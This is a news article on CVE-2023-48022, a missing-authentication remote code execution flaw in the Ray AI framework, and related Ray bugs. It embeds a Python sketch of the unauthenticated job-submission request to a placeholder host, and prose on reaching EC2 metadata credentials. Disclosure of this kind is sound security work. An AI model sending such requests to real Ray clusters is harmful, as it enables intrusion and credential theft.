Artificial Intelligence

Critical Vulnerability Found in Ray AI Framework 

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical vulnerability in Ray, an open source compute framework for AI, could allow unauthorized access to all nodes, cybersecurity firm Bishop Fox warns.

Tracked as CVE-2023-48022, the bug exists because Ray does not properly enforce authentication on at least two of its components, namely the dashboard and client.

A remote attacker can abuse this issue to submit or delete jobs without authentication. Furthermore, the attacker could retrieve sensitive information and execute arbitrary code, Bishop Fox says.

“The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install),” the cybersecurity firm notes.

CVE-2023-48022 is rooted in the fact that, in its default configuration, Ray does not enforce authentication, and does not appear to support any type of authorization model, although an optional mutual TLS authentication mode is described in the framework’s documentation.
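The optional mutual TLS mode mentioned above is enabled through environment variables on each node. A minimal sketch, assuming certificate files at hypothetical paths (the variable names follow Ray's TLS documentation):

```shell
# Enable Ray's optional mutual TLS mode (off by default).
# The certificate/key paths below are placeholders for illustration.
export RAY_USE_TLS=1
export RAY_TLS_SERVER_CERT=/etc/ray/tls/server.crt
export RAY_TLS_SERVER_KEY=/etc/ray/tls/server.key
export RAY_TLS_CA_CERT=/etc/ray/tls/ca.crt
```

Note that, per Bishop Fox, this only authenticates connections; it provides no per-user authorization.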

“In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray dashboard,” Bishop Fox says.

According to the cybersecurity firm, attackers could exploit CVE-2023-48022 by submitting arbitrary operating system commands through the job submission API.
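To illustrate why unauthenticated job submission amounts to remote code execution: the Ray dashboard (port 8265 by default) exposes a job submission endpoint whose `entrypoint` field is a shell command executed on the cluster. A minimal sketch of the request an attacker would send — the host name is a placeholder, and no request is actually made here:

```python
import json

# Hypothetical target; the Ray dashboard listens on port 8265 by default.
DASHBOARD = "http://ray-head.example.internal:8265"

# Body for the dashboard's job submission endpoint. On affected versions,
# no authentication is required, so the entrypoint shell command simply
# runs on the cluster with the Ray process's OS privileges.
payload = {"entrypoint": "id && hostname"}

request_line = f"POST {DASHBOARD}/api/jobs/"
body = json.dumps(payload)
print(request_line)
print(body)
```

Because the command runs as the Ray process owner, this is also the path to the EC2 instance credentials mentioned above: the entrypoint can simply query the cloud metadata service.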

Ray’s lack of authentication leads to other security vulnerabilities, including issues that were recently disclosed by Protect AI, which manages Huntr, the bug bounty platform for AI and ML.

Bishop Fox says it independently identified two of these issues and reported them to Ray’s maintainers (Anyscale) around the same time as Protect AI.

“However, the reports were closed based on Anyscale’s position that unauthenticated remote code execution is intentional, and therefore should not be considered a vulnerability,” the cybersecurity firm says.

Furthermore, the company says, the Ray Jobs Python SDK can be used for unauthenticated remote code execution by crafting a malicious script that uses the Ray API for task submission. The Ray client API can also be abused for unauthenticated remote code execution.

Bishop Fox draws attention to other critical-severity vulnerabilities in Ray as well, including a server-side request forgery (SSRF) bug (CVE-2023-48023) and an insecure input validation flaw (CVE-2023-6021) that Protect AI reported to the vendor this summer.

At least some of these issues, the cybersecurity firm notes, remain unpatched, as the vendor either does not recognize them as security defects or does not want to address them.

Update: The CVE IDs for the missing authentication and SSRF vulnerabilities have been corrected after learning that Bishop Fox swapped them in their initial post.

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: US, UK Cybersecurity Agencies Publish AI Development Guidance

Related: CISA Outlines AI-Related Cybersecurity Efforts

Copyright © 2024 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.